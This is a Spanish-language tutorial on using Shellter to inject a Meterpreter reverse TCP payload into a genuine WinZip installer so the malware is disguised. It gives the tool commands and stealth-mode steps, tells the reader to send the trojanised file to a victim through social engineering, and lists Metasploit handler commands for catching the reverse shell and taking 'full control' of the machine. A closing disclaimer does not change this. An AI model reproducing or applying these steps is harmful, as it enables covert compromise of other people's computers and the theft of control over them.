Cómo inyectar código malicioso dentro de archivos exe usando Shellter
Shellter es una herramienta dinámica de inyección de shellcode que se utiliza para inyectar cargas útiles en un archivo ejecutable de Windows (EXE).
Esta inyección le permite disfrazar una carga útil o un código malicioso en un archivo ejecutable real. Para demostrar esta técnica, voy a inyectar una carga útil inversa de TCP meterpreter en un EXE.
Este archivo inofensivo puede ser cualquier EXE, como el archivo CCleaner.exe o WinZip.exe. Como puede imaginar, si encuentra un método para entregar este archivo malicioso a una persona, entonces es posible comprometer el sistema de la persona sin mucha dificultad.
Instalar Shellter
Puede instalar Shellter usando el siguiente comando:
apt install shellter
Ejecutar Shellter
Shellter se puede ejecutar con el siguiente comando de terminal:
shellter
Ahora que tengo todo listo, puedo inyectar una carga en el instalador de WinZip.
La herramienta permitirá elegir entre el modo de operación Automático o Manual. Procederé con el método automático.
Shellter le pedirá el objetivo PE o la ruta al ejecutable. En mi caso, apuntaré la herramienta hacia el ejecutable que he descargado (winzip23-downwz.exe).
Luego, se le pedirá que habilite el modo oculto. Escriba 'Y' para sí.
Luego, le pide que seleccione la carga útil. En mi caso, he seleccionado 1 para Meterpreter_Reverse_TCP.
Luego se le pide que configure LHOST y LPORT. Escriba la IP del host local y el puerto local. Puede usar el comando ifconfig para encontrar su dirección IP.
Finalmente luego de ingresar la dirección y el puerto, la aplicación procede a infectar al instalador.
Enviar archivo WinZip.exe a la máquina de la víctima
En este punto, todo lo que tienes que hacer es usar tus habilidades de ingeniería social y enviar el archivo 'winzip23-downwz.exe' a la víctima. Entonces, configuremos el oyente para capturar una sesión cuando la víctima ejecuta el archivo.
En una nueva terminal, escriba msfconsole para iniciar Metasploit framework y ejecute los siguientes comandos:
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 8080
msf5> run
Desde aquí, tiene control total sobre la máquina de destino.
Nota: Tenga en cuenta que toda la información se utiliza para ampliar el conocimiento y no para causar ataques maliciosos o dañinos.
¡Gracias por leer este artículo!

![¿Qué es una lista vinculada, de todos modos? [Parte 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































